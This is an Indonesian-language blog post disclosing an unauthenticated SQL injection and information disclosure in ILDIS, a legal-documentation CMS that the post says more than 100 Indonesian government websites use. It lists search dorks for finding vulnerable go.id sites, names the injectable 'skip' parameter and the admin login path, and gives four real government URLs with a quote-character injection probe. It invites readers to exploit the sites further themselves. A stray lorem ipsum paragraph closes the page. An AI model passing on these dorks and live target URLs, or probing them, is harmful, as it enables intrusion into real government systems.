ILDIS - Unauthenticated SQL Injection and Information Disclosure

 


-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-


Kali ini kita akan membahas sebuah vulnerability di sebuah WebApp semacam CMS dengan nama ILDIS (Indonesian Legal Documentation dan Information System). Jenis Vulnerability nya adalah SQL Injection,dan Information Disclosure.


Dan perlu dibaca untuk yang satu ini, WebApp ILDIS Ini sudah dipakai di 100 lebih website pemerintahan negara indonesia :D. Vulnerabilitynya sendiri saya temukan kemarin, sejak saya menemukan WebApp ILDIS v2,dan saya memutuskan untuk mencari tau apa itu ILDIS :D.


Apa itu ILDIS?

https://jabar.kemenkumham.go.id/berita-kanwil/berita-utama/aplikasi-standar-jdih-ildis-percepat-integrasi-basis-data-dokumen-hukum-nasional


Okeh disini saya hanya memberi Dork,dan letak Vulnerabilitynya saja. Jika kalian ingin mengeksekusi lebih jauh, silakan saja :D.


Bahan : 

- Dork : "ILDIS" site:go.id

               inurl:?jenis_peraturan= site:go.id

               inurl:/index.php/web/result?

- Vulnerable parameter : skip=[value][SQL Query]

- Admin Login : 

https://localhost/index.php/login

https://localhost/[path]/index.php/login


Example : 

https://jdih.bkn.go.id/ildis/www/index.php/web/result?&skip=2410'

https://jdih.kemlu.go.id/ildis/www/index.php/web/result?&skip=10'

https://jdih.balitbangham.go.id/ildis/www/index.php/web/result?&skip=1'

https://jdih.kemsos.go.id/pencarian/www/index.php/web/result?&skip=1'


Sebenarnya masih banyak lagi website nya :D, kalian cari sendiri saja menggunakan dork diatas yah.


Thanks

See U

Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.